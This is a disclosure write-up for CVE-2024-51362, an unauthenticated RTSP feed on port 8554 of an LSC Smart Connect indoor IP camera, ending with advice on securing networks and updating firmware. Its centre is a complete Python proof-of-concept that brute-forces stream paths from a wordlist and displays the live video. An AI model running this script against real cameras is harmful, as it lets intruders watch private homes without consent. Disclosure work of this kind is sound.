CVE-2024-51362

Introduction

Vulnerability Type: Incorrect Access Control
Affected Product Code Base: Indoor IP Camera - V7.6.32
Affected Component: RTSP Protocol, Port 8554, Authentication Mechanism
Vendor: LSC Smart Connect
CVSS: 6.5 medium (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

In this article, we’ll discuss a critical vulnerability discovered in a popular IP camera that we purchased from Action. This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-51362.

Summary

A recently discovered vulnerability in the LSC Smart Connect Indoor IP Camera could allow unauthorized access to live camera footage if the camera is connected to an insecure network. This issue exposes users to privacy risks, as malicious actors can view the camera’s live feed without any credentials.

Technical Details

The vulnerability arises from an exposed RTSP (Real-Time Streaming Protocol) port, specifically port 8554, which allows remote access to the camera feed. Typically, users would only access the camera through the LSC Smart Home app, and nowhere in the product’s documentation does it mention the availability of the RTSP feed on this port. This means that many users are likely unaware of the risk, as they rely on the app for control and access.

RTSP is commonly used for streaming video feeds, and it requires authentication to prevent unauthorized access. However, in this case, the LSC Smart Connect Indoor IP Camera does not enforce any authentication on this port, allowing anyone on the same network as the device to view its live footage without restrictions.

# bruteforce script the directory for the rtsp stream 
# The input file is a list of directories to try, you could use a wordlist from seclists
import cv2
import argparse
import socket
import time

def bf(ip_address, port, file):
    # RTSP-stream URL
    rtsp_ip = f"{ip_address}:{port}"

    try:
        # Attempt to create a socket connection with a timeout
        print("Attempting to connect...")
        socket.create_connection((ip_address, port), timeout=5)
        print("Connection successful!")
    except socket.timeout:
        # If a timeout occurs, print a countdown
        for remaining_time in range(5, 0, -1):
            print(f"Time out in {remaining_time}")
            time.sleep(1)
        print("Timed out")
        exit()

    # Make a VideoCapture object to connect to the RTSP-stream
    with open(file, 'r') as directories:
        for directory in directories:
            directory = directory.strip()

            cap = cv2.VideoCapture(f"rtsp://{rtsp_ip}+{directory}")

            # Check if the connection is opened
            if cap.isOpened():
                print(f"Connection successful with directory: {directory}")
                break
            print(f"Connection failed with directory: {directory}")
            continue

    # Loop to capture frames
    while True:
        ret, frame = cap.read()

        # Check if the frame is successfully captured
        if not ret:
            print("Cannot capture frame.")
            break

        # Further processing of the frame can be done here (e.g., display)
        cv2.imshow("RTSP Stream", frame)

        # Press 'q' to exit the loop
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break

    # Close the connection and windows
    cap.release()
    cv2.destroyAllWindows()
    

def main():
    parser = argparse.ArgumentParser(description="Real Time Streaming Protocol (RTSP) Bruteforce directory script")
    parser.add_argument("-ip", "--ip_address", type=str, required=True, help="the IP address")
    parser.add_argument("-p", "--port", type=int, required=True, help="the port")
    parser.add_argument("-f", "--file", type=str, required=True, help="path to file")
    args = parser.parse_args()

    bf(args.ip_address, args.port, args.file)

if __name__ == "__main__":
    main()

Impact

If exploited, this vulnerability could allow attackers to gain unauthorized access to live video feeds from the affected camera. This could be used for various malicious purposes, including spying on individuals, monitoring private spaces, or conducting surveillance operations. The potential impact of this vulnerability is significant, as it compromises the privacy and security of users who rely on these cameras for monitoring and surveillance purposes.

Mitigation Steps

Users are advised to avoid connecting the camera to untrusted networks. Additionally, users should take the following steps to mitigate the risk of unauthorized access to the camera feed:

Secure Your Network: Ensure that your Wi-Fi network is protected with a strong password, and avoid sharing network access with untrusted devices or individuals.
Separate the Camera: If possible, connect the camera to a dedicated Wi-Fi network isolated from other devices. This helps contain potential security risks by limiting access to the camera’s network.
Monitor for Updates: Keep the camera firmware updated and watch for any patches from LSC Smart Connect that may address this security flaw.